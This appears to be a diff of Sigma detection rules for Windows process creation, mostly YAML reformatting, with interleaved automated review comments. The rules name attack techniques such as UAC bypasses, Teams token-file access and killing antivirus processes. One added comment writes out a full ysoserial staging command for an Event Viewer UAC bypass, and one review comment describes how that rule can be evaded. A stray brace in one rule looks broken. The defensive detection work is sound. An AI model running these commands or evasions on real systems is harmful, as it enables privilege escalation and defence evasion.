@@ -19,17 +18,16 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: - - \Sysmon64.exe - - \Sysmon.exe - - Description: System activity monitor + - NewProcessName|endswith: + - \Sysmon64.exe + - \Sysmon.exe + - Description: System activity monitor selection_cli: - CommandLine|contains: + CommandLine|contains: - -u - /u condition: process_creation and (all of selection_*) falsepositives: - - Legitimate administrators might use this command to remove Sysmon for debugging - purposes + - Legitimate administrators might use this command to remove Sysmon for debugging purposes level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml b/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml index 8f2f9e403..d81b0b067 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml @@ -1,8 +1,7 @@ title: Potential Binary Impersonating Sysinternals Tools id: 7cce6fc8-a07f-4d84-a53e-96e1879843c9 status: test -description: Detects binaries that use the same name as legitimate sysinternals tools - to evade detection +description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite author: frack113 @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection_exe: - NewProcessName|endswith: + NewProcessName|endswith: - \accesschk.exe - \accesschk64.exe - \AccessEnum.exe @@ -172,7 +171,7 @@ detection: - Sysinternals - www.sysinternals.com - Sysinternals filter_empty: - Company: null + Company: condition: process_creation and (selection_exe and not 1 of filter*) falsepositives: - Unknown 
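Review bot: In proc_creation_win_sysinternals_tools_masquerading.yml the filter_empty value changes from `Company: null` to a bare `Company:`, which YAML still parses as null but now relies on an implicit value to express "field absent" and is easy to misread as an accidental blank. Either keep the explicit `null` or add `# null: match events with no Company value` so the intent survives future reformatting. The filter_* set and selection_exe start above this hunk.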
diff --git a/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml index f8edc7d8d..c0874a77c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml +++ b/sigma/builtin/process_creation/proc_creation_win_sysprep_appdata.yml @@ -1,8 +1,7 @@ title: Sysprep on AppData Folder id: d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e status: test -description: Detects suspicious sysprep process start with AppData folder as target - (as used by Trojan Syndicasec in Thrip report by Symantec) +description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) references: - https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets - https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b @@ -20,11 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \AppData\ - NewProcessName|endswith: \sysprep.exe + CommandLine|contains: \AppData\ + NewProcessName|endswith: \sysprep.exe condition: process_creation and selection falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml b/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml index 673823133..c1f10d0c7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_systeminfo_execution.yml 
@@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \systeminfo.exe - - OriginalFileName: sysinfo.exe + - NewProcessName|endswith: \systeminfo.exe + - OriginalFileName: sysinfo.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml b/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml index a12f7dbda..288eb97a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml +++ b/sigma/builtin/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml @@ -1,11 +1,10 @@ title: Potential Signing Bypass Via Windows Developer Features id: a383dec4-deec-4e6e-913b-ed9249670848 related: - - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 - type: similar + - id: b110ebaf-697f-4da1-afd5-b536fa27a2c1 + type: similar status: test -description: Detects when a user enable developer features such as "Developer Mode" - or "Application Sideloading". Which allows the user to install untrusted packages. +description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ 
@@ -21,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \SystemSettingsAdminFlows.exe - - OriginalFileName: SystemSettingsAdminFlows.EXE + - NewProcessName|endswith: \SystemSettingsAdminFlows.exe + - OriginalFileName: SystemSettingsAdminFlows.EXE selection_flag: - CommandLine|contains: TurnOnDeveloperFeatures + CommandLine|contains: TurnOnDeveloperFeatures selection_options: - CommandLine|contains: + CommandLine|contains: - DeveloperUnlock - EnableSideloading condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml b/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml index 643601b7a..e4b29a970 100644 --- a/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml +++ b/sigma/builtin/process_creation/proc_creation_win_takeown_recursive_own.yml @@ -1,8 +1,7 @@ title: Suspicious Recursive Takeown id: 554601fb-9b71-4bcc-abf4-21a611be4fde status: test -description: Adversaries can interact with the DACLs using built-in Windows commands - takeown which can grant adversaries higher permissions on specific files and folders +description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '/f ' - /r - NewProcessName|endswith: \takeown.exe + NewProcessName|endswith: \takeown.exe condition: process_creation and selection fields: - CommandLine 
diff --git a/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml b/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml index da81ed22f..6b08205e1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tapinstall_execution.yml @@ -1,8 +1,7 @@ title: Tap Installer Execution id: 99793437-3e16-439b-be0f-078782cf953d status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunneling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2023/12/11 @@ -17,15 +16,15 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \tapinstall.exe + NewProcessName|endswith: \tapinstall.exe filter_optional_avast: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files\Avast Software\SecureLine VPN\ - :\Program Files (x86)\Avast Software\SecureLine VPN\ filter_optional_openvpn: - NewProcessName|contains: :\Program Files\OpenVPN Connect\drivers\tap\ + NewProcessName|contains: :\Program Files\OpenVPN Connect\drivers\tap\ filter_optional_protonvpn: - NewProcessName|contains: :\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\ + NewProcessName|contains: :\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\ condition: process_creation and (selection and not 1 of filter_optional_*) falsepositives: - Legitimate OpenVPN TAP insntallation diff --git a/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml b/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml index e3c40bf25..04a72676c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tar_compression.yml 
@@ -1,11 +1,9 @@ title: Compressed File Creation Via Tar.EXE id: 418a3163-3247-4b7b-9933-dcfcb7c52ea9 status: experimental -description: 'Detects execution of "tar.exe" in order to create a compressed file. - +description: | + Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ @@ -25,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tar.exe - - OriginalFileName: bsdtar + - NewProcessName|endswith: \tar.exe + - OriginalFileName: bsdtar selection_create: - CommandLine|contains: + CommandLine|contains: - -c - -r - -u diff --git a/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml index bd4683059..f571b23dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tar_extraction.yml @@ -1,11 +1,9 @@ title: Compressed File Extraction Via Tar.EXE id: bf361876-6620-407a-812f-bfe11e51e924 status: experimental -description: 'Detects execution of "tar.exe" in order to extract compressed file. - +description: | + Detects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection. - - ' references: - https://unit42.paloaltonetworks.com/chromeloader-malware/ - https://lolbas-project.github.io/lolbas/Binaries/Tar/ 
@@ -25,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tar.exe - - OriginalFileName: bsdtar + - NewProcessName|endswith: \tar.exe + - OriginalFileName: bsdtar selection_extract: - CommandLine|contains: -x + CommandLine|contains: -x condition: process_creation and (all of selection_*) falsepositives: - Likely diff --git a/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml b/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml index 18aa97f9d..00376c140 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskkill_sep.yml @@ -1,17 +1,10 @@ title: Taskkill Symantec Endpoint Protection id: 4a6713f6-3331-11ed-a261-0242ac120002 status: test -description: 'Detects one of the possible scenarios for disabling Symantec Endpoint - Protection. - - Symantec Endpoint Protection antivirus software services incorrectly implement - the protected service mechanism. - - As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command - several times ccSvcHst.exe /f, thereby killing the process belonging to the service, - and thus shutting down the service. - - ' +description: | + Detects one of the possible scenarios for disabling Symantec Endpoint Protection. + Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. + As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service. references: - https://www.exploit-db.com/exploits/37525 - https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection @@ -29,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - taskkill - ' /F ' - ' /IM ' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml b/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml index f58a05987..d26db10b3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tasklist_basic_execution.yml @@ -1,9 +1,7 @@ title: Suspicious Tasklist Discovery Command id: 63332011-f057-496c-ad8d-d2b6afb27f96 status: test -description: Adversaries may attempt to get information about running processes on - a system. Information obtained could be used to gain an understanding of common - software/applications running on systems within the network +description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist author: frack113 @@ -20,9 +18,9 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: tasklist - - NewProcessName|endswith: \tasklist.exe - - OriginalFileName: tasklist.exe + - CommandLine|contains: tasklist + - NewProcessName|endswith: \tasklist.exe + - OriginalFileName: tasklist.exe condition: process_creation and selection falsepositives: - Administrator, hotline ask to user diff --git a/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml b/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml index 8fa2a412e..f28937bc5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskmgr_localsystem.yml 
@@ -16,10 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - NewProcessName|endswith: \taskmgr.exe + NewProcessName|endswith: \taskmgr.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml index 8561d95b8..2f8bfe4e9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_taskmgr_susp_child_process.yml @@ -18,7 +18,7 @@ detection: selection: ParentProcessName|endswith: \taskmgr.exe filter: - NewProcessName|endswith: + NewProcessName|endswith: - \resmon.exe - \mmc.exe - \taskmgr.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index dcf54ad41..0db4a2f2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml 
@@ -1,13 +1,9 @@ title: Potentially Suspicious Command Targeting Teams Sensitive Files id: d2eb17db-1d39-41dc-b57f-301f6512fa75 status: experimental -description: 'Detects a commandline containing references to the Microsoft Teams database - or cookies files from a process other than Teams. - - The database might contain authentication tokens and other sensitive information - about the logged in accounts. - - ' +description: | + Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. + The database might contain authentication tokens and other sensitive information about the logged in accounts. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens @@ -25,11 +21,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - \Microsoft\Teams\Cookies - \Microsoft\Teams\Local Storage\leveldb filter_main_legit_locations: - NewProcessName|endswith: \Microsoft\Teams\current\Teams.exe + NewProcessName|endswith: \Microsoft\Teams\current\Teams.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml b/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml index 88337cebf..e37e96b82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml 
@@ -17,9 +17,9 @@ detection: Channel: Security selection_img: OriginalFileName: TpmVscMgr.exe - NewProcessName|endswith: \tpmvscmgr.exe + NewProcessName|endswith: \tpmvscmgr.exe selection_cli: - CommandLine|contains: create + CommandLine|contains: create condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by an administrator diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml index 9978f7abd..7a70a5245 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_localsystem.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - NewProcessName|endswith: \tscon.exe + NewProcessName|endswith: \tscon.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml index 363da4fff..ea2fbe9ec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_redirect.yml @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /dest:rdp-tcp#' + CommandLine|contains: ' /dest:rdp-tcp#' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml index d7604cdab..aa9e09615 100644 --- a/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml +++ b/sigma/builtin/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml 
@@ -16,8 +16,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \tscon.exe - - OriginalFileName: tscon.exe + - NewProcessName|endswith: \tscon.exe + - OriginalFileName: tscon.exe selection_integrity: MandatoryLabel: S-1-16-16384 condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml index c8a06bfa4..d8b778bdf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml @@ -21,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \changepk.exe + NewProcessName|endswith: \changepk.exe ParentProcessName|endswith: \slui.exe MandatoryLabel: - S-1-16-12288 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml index 312dbd322..3acd4e7d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_cmstp.yml @@ -1,8 +1,7 @@ title: Bypass UAC via CMSTP id: e66779cc-383e-4224-a3a4-267eeb585c40 status: test -description: Detect commandline usage of Microsoft Connection Manager Profile Installer - (cmstp.exe) to install specially formatted local .INF files +description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files references: - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md 
@@ -23,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmstp.exe - - OriginalFileName: CMSTP.EXE + - NewProcessName|endswith: \cmstp.exe + - OriginalFileName: CMSTP.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - /s - -s - /au diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml index 4c3c6a995..d0ac1bd37 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml @@ -1,8 +1,7 @@ title: UAC Bypass Tools Using ComputerDefaults id: 3c05e90d-7eba-4324-9972-5d7f711a60a8 status: test -description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe - (UACMe 59) +description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -23,7 +22,7 @@ detection: MandatoryLabel: - S-1-16-12288 - S-1-16-16384 - NewProcessName: C:\Windows\System32\ComputerDefaults.exe + NewProcessName: C:\Windows\System32\ComputerDefaults.exe filter: ParentProcessName|contains: - :\Windows\System32 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml index cdb42a52d..516a79481 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Using Consent and Comctl32 - Process id: 1ca6bd18-0ba0-44ca-851c-92ed89a61085 status: test -description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll - (UACMe 22) +description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \consent.exe - NewProcessName|endswith: \werfault.exe + NewProcessName|endswith: \werfault.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml index e1351d3f7..1d017a285 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_dismhost.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using DismHost id: 853e74f9-9392-4935-ad3b-2e8c040dae86 status: test -description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe - 63) +description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml index 7aed4114a..6f6b525be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml 
@@ -1,8 +1,8 @@ title: UAC Bypass Using Event Viewer RecentViews id: 30fc8de7-d833-40c4-96b6-28319fbc4f6c related: - - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 - type: similar + - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43 + type: similar status: test description: Detects the pattern of UAC Bypass using Event Viewer RecentViews references: @@ -21,11 +21,12 @@ detection: EventID: 4688 Channel: Security selection_path: - CommandLine|contains: + # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe + CommandLine|contains: - \Event Viewer\RecentViews - \EventV~1\RecentViews selection_redirect: - CommandLine|contains: '>' + CommandLine|contains: '>' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml index 568686e57..55258915c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_fodhelper.yml @@ -1,8 +1,7 @@ title: Bypass UAC via Fodhelper.exe id: 7f741dcf-fc22-4759-87b4-9ae8376676a2 status: test -description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries - use this technique to execute privileged processes. +description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md 
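Review bot: The added example shows the payload being staged with `copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews`, yet `selection_redirect` still demands a `>` on the command line, so a variant that stages the file with `copy`, `Copy-Item` or `Set-Content` in its own process and never uses shell redirection is not matched. Consider widening the second selection to `CommandLine|contains: ['>', 'copy ', 'Copy-Item', 'Set-Content']` or documenting the gap next to it with `# Note: only redirect-based staging is covered; direct copy/Set-Content writes to RecentViews are not`. The example itself also has a typo, `- g DataSet` where ysoserial takes `-g DataSet`, which will trip anyone pasting it to reproduce the test. The rule's detection block ends inside this hunk, so no further selections constrain it.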
diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml index b2f821f19..488ee201e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ieinstal.yml @@ -23,8 +23,8 @@ detection: - S-1-16-12288 - S-1-16-16384 ParentProcessName|endswith: \ieinstal.exe - NewProcessName|contains: \AppData\Local\Temp\ - NewProcessName|endswith: consent.exe + NewProcessName|contains: \AppData\Local\Temp\ + NewProcessName|endswith: consent.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml index 2eaab17ef..e32af132f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine: '"C:\Windows\system32\msconfig.exe" -5' + CommandLine: '"C:\Windows\system32\msconfig.exe" -5' MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml index 0857f7df4..76110e0e4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Using NTFS Reparse Point - Process id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7 status: test -description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe - DLL hijacking (UACMe 36) +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -20,22 +19,21 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' - CommandLine|endswith: \AppData\Local\Temp\update.msu + CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' + CommandLine|endswith: \AppData\Local\Temp\update.msu MandatoryLabel: - S-1-16-12288 - S-1-16-16384 selection2: - ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart - /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' - CommandLine|contains|all: + ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Temp\ - \dismhost.exe { MandatoryLabel: - S-1-16-12288 - S-1-16-16384 - NewProcessName|endswith: \DismHost.exe + NewProcessName|endswith: \DismHost.exe condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml index 247a28c1a..6fabae67c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Using PkgMgr and DISM id: a743ceba-c771-4d75-97eb-8a90f7f4844c status: test -description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe - 23) +description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,7 +20,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \pkgmgr.exe - NewProcessName|endswith: \dism.exe + NewProcessName|endswith: \dism.exe MandatoryLabel: - S-1-16-12288 - S-1-16-16384 diff --git a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml index 03a5e24f8..8950c5c82 100644 --- a/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml +++ b/sigma/builtin/process_creation/proc_creation_win_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: Potential UAC Bypass Via Sdclt.EXE id: 40f9af16-589d-4984-b78d-8c2aec023197 status: test -description: A General detection for sdclt being spawned as an elevated process. This - could be an indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - 